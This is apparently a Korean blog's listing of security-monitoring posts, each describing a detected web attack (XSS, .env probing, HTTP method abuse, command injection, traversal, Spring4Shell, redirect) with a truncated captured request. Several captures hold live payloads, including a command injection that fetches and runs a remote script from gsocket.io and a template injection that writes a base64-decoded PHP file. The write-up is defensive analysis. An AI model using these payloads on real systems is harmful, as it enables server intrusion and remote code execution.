반응형

분류 전체보기 52

[보안관제] 크로스 사이트 스크립팅(Cross-site scripting (XSS))

공격설명이 취약점은 게시판이나 웹 서버 등에 스크립트 코드를 삽입하여 개발자가 의도하지 않은 기능을 작동시키거나 오류를    발생시키는 공격으로, 공격에 성공할 경우, 공격자는 XSS 취약점 존재 여부를 확인할 수 있으며 이후 연계된 공격 시도를 통한 데이터 조작 및 삭제 등의 피해를 야기할 수 있습니다. 공격구문GET /cos/hlp_list.jsp?largeCategory=1'"()&%/ScRiPt>&page=1&pageSize=10&searchKeyword4user=1&smallCategory=1 HTTP/1.1Referer: hxxps://career.sw.or.kr/Cookie: JSESSIONID=078DC3B8F4283F408E9D02E0D9DF4BDBAccept: text/html,appl..

[보안관제] 자동화 스캐닝 도구 탐지(Web Server Probe)

공격설명HTTP 헤더를 검사하여 스캐너 및 검색 엔진, 크롤링, 악성 봇 탐지자동화 스캐닝 도구는 웹 컨텐츠 및 데이터 수집, 크롤링을 위한 목적으로 사용되며, 이러한 무분별한 스캔 시도는 네트워크 트래픽을 증가시키고 대역폭을 차지하여 서비스 장애를 유발할 수 있다.-----------------------------------------------------------------------------------------------------------이 HTTP 요청은 .env.example 파일을 요청하고 있으며, 이는 보안적으로 민감한 요청일 수 있다.요청된 파일은 일반적으로 애플리케이션 환경 설정(예: 데이터베이스 정보, API 키 등)을 포함할 가능성이 있는 샘플 파일로, 이를 통해 시스템의 ..

[보안관제] HTTP 메소드 취약점 공격(Illegal method)

공격설명허용되지 않는 메소드 접근 및 메소드 취약점 공격이 탐지HTTP 웹 통신에서 일반적인 웹 서비스에 필요한 GET, POST, HEAD 외 메소드(DELETE, OPTIONS, CONNECT 등)를 기본적으로 허용하지 않는 것을 권고한다.불필요한 메소드가 열려 있을 경우 이를 악용하여 서버의 파일을 사용(업로드/삭제)하거나 서버의 환경 또는 상태 정보를 확인하고 터널 연결등이 가능하다. 공격구문PROPFIND / HTTP/1.1Connection: Keep-AliveCookie: AUTH_CODE\=cGluZ3Bpbmd8MTczMjU4NTgxNzM5N3wxODYyfDIyMS4yMjQuMjEuMTM0; JSESSIONID\=B9A641B79F204B9AA6D6F7D26AA26E64.GW_PROD4; ..

[보안관제] 명령어 실행 및 삽입 공격 탐지(Command Injection)

공격설명명령어 실행 및 삽입 공격은 웹 어플리케이션에서 발생하는 보안 취약성 중 하나로, 명령 프롬프트나 셸 명령어를 실행하는 부분에서 발생할 수 있다.공격자는 Command Injection 공격을 통해 웹 서버의 민감한 정보 획득할 수 있고, 그에 따라 DB 탈취 및 사용자 인증 우회 등의 연계된 공격을 수행할 수 있다. 공격구문GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash -c "$(curl -fsSL hxxps://gsocket.io/y)" HTTP/1.1Host: User-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveX-Forward..

[보안관제] 검증 안된 리다이렉트 탐지(Unverified Redirect)

공격설명웹 페이지가 변조되어, 페이지 방문 시 타 사이트로 자동 전환시키는 공격을 탐지하는 정책이다.300 ~ 307 응답 헤더의 Redirect URL이 HTTP 요청 헤더의 호스트와 다를 경우 검증안된 리다이렉트로 간주한다. 공격구문GET /recipe-lab/archive/how-to-make-ssamjang HTTP/1.1Host: 70th.sempio.comConnection: keep-aliveAccept-Language: en-US,en;q=0.5Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compa..

[보안관제] 명령어 실행 및 삽입 공격 탐지(command Injection)

공격설명명령어 주입 취약점은 웹 어플리케이션에서 발생하는 보안 취약성 중 하나로, 명령 프롬프트나 셸 명령어를 실행하는 부분에서 발생할 수 있다.공격자는 Command Injection 공격을 통해 웹 서버의 민감한 정보 획득할 수 있고 그에 따라 DB 탈취 및 사용자 인증 우회 등의 연계된 공격을 수행할 수 있다. 공격구문GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash -c "$(curl -fsSL hxxps://gsocket.io/y)" HTTP/1.1Host: User-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveX-Forwarded-Pr..

[보안관제] 디렉토리 우회공격 시도 탐지

공격설명서버의 잘못된 설정 및 중요 파일의 위치 오류를 이용하여 디렉터리나 파일에 접근하여 자료를 유출하고 위변조하는 공격 디렉토리 탐색 공격은 공격자가 응용 프로그램을 실행하는 서버에서 임의의 파일을 읽을 수 있도록 하는 웹 보안 취약점이며, "상위 디렉토리로 이동"을 나타내는 문자인 “../”를 사용하여 최상위 루트 디렉토리에 접근이 가능합니다.공격자는 서버의 임의의 파일에 접근하여 응용 프로그램 데이터 또는 동작을 수정하고 제어할 수 있습니다.해당 파일에 접근이 가능할 경우, 웹 구성 정보 및 기타 파일 정보와 관련된 정보가 공격자에게 노출될 수 있습니다. 공격구문GET /{pboot:if(("file_put_co"."ntents")("a1t.php",("base6"."4_decode")("YW5h..

[보안관제] 정보 유출 취약점 공격 탐지

공격설명정보 유출 취약점 공격은 공격지가 시스템이나 APP의 보안 취약점을 이용해 민감한 데이터를 불법적으로 획득할 수 있다. 이러한 공격은 개인정보, 기업 기밀, 금융 정보 등 다양한 형태의 중요 정보를 노출시킬 수 있어 심각한 피해를 초래할 수 있다. 공격구문 GET /order/orderProc.jsp HTTP/1.1User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36Accept-Encoding: gzip, deflate, brFrom: bingbot(at)microsoft...

[보안관제] OS 명령어 삽입 시도 탐지(Spring Core Spring4Shell CVE-2022-22965 Command Injection-1)

공격설명공격자는 웹기반의 URL취약점을 이용하여 운영체제 기반의 명령어를 담아 브라우징 시 문제를 발생시킬 수 있다. 패킷 확인 결과, 해당 출발지 IP로부터 URL 취약점을 통한 명령어 삽입 시도를 확인되며, 공격 성공 시, 공격자는 외부의 서버로부터 임의의 파일을 다운로드 및 권한 상승, 실행하여 웹 서버 취약점을 발생시킬 수 있다. 공격구문GET / HTTP/1.1 Host: User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive suffix: %>// c1: Runtime c2: DNT: 1 Content-Type: application/x-www-form-urlencode..

[보안관제] 비정상적인 HTTP 이벤트 탐지건 임계치 초과

공격설명 웹방화벽에서 탐지된 비정상적인 HTTP 요청 이벤트가 임계치를 초과함을 확인탐지된 HTTP 요청은 웹 서버의 특정 경로(/protected/.env)에 있는 .env 파일을 요청하는 형식이다. .env 파일에는 민감한 정보(예: 데이터베이스 비밀번호, API 키 등)가 저장되어 있을 가능성이 크며, 이런 파일을 인터넷에 노출하는 것은 보안에 매우 위험하다. 공격구문GET /protected/.env HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh;Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/39.0.2171.95 Safari/537.36Accept-Encoding: gzip, d..

반응형